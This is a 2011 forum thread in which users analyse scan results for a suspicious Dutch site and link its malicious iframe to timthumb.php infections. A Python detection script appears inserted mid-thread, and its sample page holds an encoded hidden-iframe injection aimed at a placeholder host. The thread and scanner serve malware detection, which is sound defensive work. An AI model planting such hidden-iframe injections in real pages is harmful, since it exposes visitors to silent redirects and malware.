polonus
December 11, 2011, 8:46pm
1
Hi forum friends,
According to urlquery the site is suspicious: http://urlquery.net/report.php?id=11338
Found this also according to VW: HTML/IFrame.acu RIPE NL ripe-admin at trueserver dot nl 87.233.207.23 to 87.233.207.23 gft-afval dot nl -http://gft-afval.nl/html/home.htm
Scanned here: http://www.virustotal.com/url-scan/report.html?id=04ef060aae2dbb62a1eef6e5321270a7-1323631080 results 2 /16 (12.5%)
VT results for home_start.php: http://www.virustotal.com/file-scan/report.html?id=5a9a7b8512e8270f2f3eef62f23fe4a3513b0bea4eded3546b90b5455cbd7702-1323634685
Sucuri gives an all green and avast should detect JS:Redirector-KD [Trj] or has the website been cleansed? Because an older VT result gives these results: http://www.virustotal.com/file-scan/report.html?id=fdf4fc138d9870eda49c6ba2c75f468b8e253a1aa9854a7fbab4375a8f82dc0b-1323561769
This last VT result has a completely different MD5 hash!
polonus
Donovan
December 11, 2011, 8:54pm
2
Why does the site just contain an obfuscated frame?
polonus
December 11, 2011, 9:06pm
3
This part is suspicious:
-gft-afval.nl/html/…/Scripts/AC_RunActiveContent.js suspicious
[suspicious:2] (ipaddr:87.233.207.23) (script) -gft-afval.nl/html/…/Scripts/AC_RunActiveContent.js
status: (referer=-gft-afval.nl/html/start.php)saved 8321 bytes 46c525e5b491bfd94ded94351779553c6892c3fe
info: [decodingLevel=0] found JavaScript
This is the DrWeb URL scan: Checking: -http://gft-afval.nl/html/footer.php
File size: 886 bytes
File MD5: a19a6b0084abfbd13bdad70cf51867ee
-http://gft-afval.nl/html/footer.php - archive HTML
-http://gft-afval.nl/html/footer.php/Script.0 - Ok
-http://gft-afval.nl/html/footer.php/Script.1 - Ok
-http://gft-afval.nl/html/footer.php - Ok
Checking: -http://gft-afval.nl/html/menu.htm
File size: 2634 bytes
File MD5: 7c503a4125a736df934121557b5cac57
-http://gft-afval.nl/html/menu.htm - archive HTML
-http://gft-afval.nl/html/menu.htm/Script.0 - Ok
-http://gft-afval.nl/html/menu.htm/Script.1 - Ok
-http://gft-afval.nl/html/menu.htm/Script.2 - Ok
-http://gft-afval.nl/html/menu.htm - Ok
Checking: -http://gft-afval.nl/html/home_start.php
File size: 3572 bytes
File MD5: e78660175b0e034a789deff6ba2c12c9
-http://gft-afval.nl/html/home_start.php - archive HTML
-http://gft-afval.nl/html/home_start.php/Script.0 - Ok
-http://gft-afval.nl/html/home_start.php/Script.1 - Ok
-http://gft-afval.nl/html/home_start.php/Script.2 - Ok
-http://gft-afval.nl/html/home_start.php - Ok
Checking: -http://gft-afval.nl/html/home.htm
Engine version: 5.0.2.3300
Total virus-finding records: 2925336
File size: 4141 bytes
File MD5: 24f2bf23e4e269ae78e458ffe6beec4e
-http://gft-afval.nl/html/home.htm - archive HTML
-http://gft-afval.nl/html/home.htm/Script.0 - Ok
-http://gft-afval.nl/html/home.htm/Script.1 infected with JS.Click.234
And avast detects via Webshield: JS:Redirector-KD[Trj]
polonus
polonus
December 11, 2011, 9:15pm
4
Hi donovansrb,
Good find, my friend, the answer to your question has been given here as “more timthumb.php infections”, read: http://wewatchyourwebsite.com/wordpress/tag/string-prototype-testharc/
link source author = We Watch Your Website admin.
Or you put a search request into the Google search engine for “String.prototype.test=”harC”.
polonus
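A defender-side check for the two indicators this thread turns on (the injected String.prototype.test="harC" script and an obfuscated, hidden iframe written via unescape), as an added example that is not from the forum posts or from any of the scanners mentioned; the sample page, the example.invalid host and the indicator names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Indicators discussed in the thread. The "harC" string is the one the
# thread quotes; the iframe rule is the generic hidden-iframe shape
# (zero size or hidden style) that such injections produce.
INDICATORS = {
    "string-prototype-harC": re.compile(
        r'String\.prototype\.test\s*=\s*["\']harC["\']'),
    "hidden-iframe": re.compile(
        r'<iframe\b[^>]*(?:\b(?:width|height)\s*=\s*["\']?0\b'
        r'|visibility\s*:\s*hidden|display\s*:\s*none)', re.I),
}

# unescape("...") with a percent-encoded payload, the usual way an
# injected iframe is hidden from a plain text search of the page.
UNESCAPE_CALL = re.compile(r'unescape\(\s*["\']([^"\']+)["\']\s*\)', re.I)


def decode_unescape_payloads(text: str) -> list[str]:
    """Return the decoded string of every unescape("...") call in text."""
    return [unquote(m.group(1)) for m in UNESCAPE_CALL.finditer(text)]


def scan_html(text: str) -> list[tuple[str, int, str]]:
    """Scan page source line by line and return (indicator, line, snippet).

    Each line is checked both as written and after decoding any
    unescape() payloads it carries, so an encoded iframe is still found.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        candidates = [line] + decode_unescape_payloads(line)
        for name, pattern in INDICATORS.items():
            for candidate in candidates:
                match = pattern.search(candidate)
                if match:
                    hits.append((name, lineno, match.group(0)[:60]))
                    break
    return hits


# Constructed sample page: a legitimate Adobe Flash-detection include
# (AC_RunActiveContent.js, which is not flagged on its own), the injected
# prototype script, and an encoded hidden iframe pointing at a placeholder host.
SAMPLE_PAGE = """<html><head><title>Home</title>
<script type="text/javascript" src="Scripts/AC_RunActiveContent.js"></script>
<script>String.prototype.test="harC";</script>
</head><body>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fin.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"))</script>
<p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for name, lineno, snippet in scan_html(SAMPLE_PAGE):
        print(f"line {lineno}: {name}: {snippet}")
```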
Donovan
December 11, 2011, 9:45pm
5
JavaScript that detects the Flash Player version.
http://i795.photobucket.com/albums/yy238/Donovansrb10/GFT-afval_NL-JS_Copyrighted.png
See attached. The red is what could be causing the alert.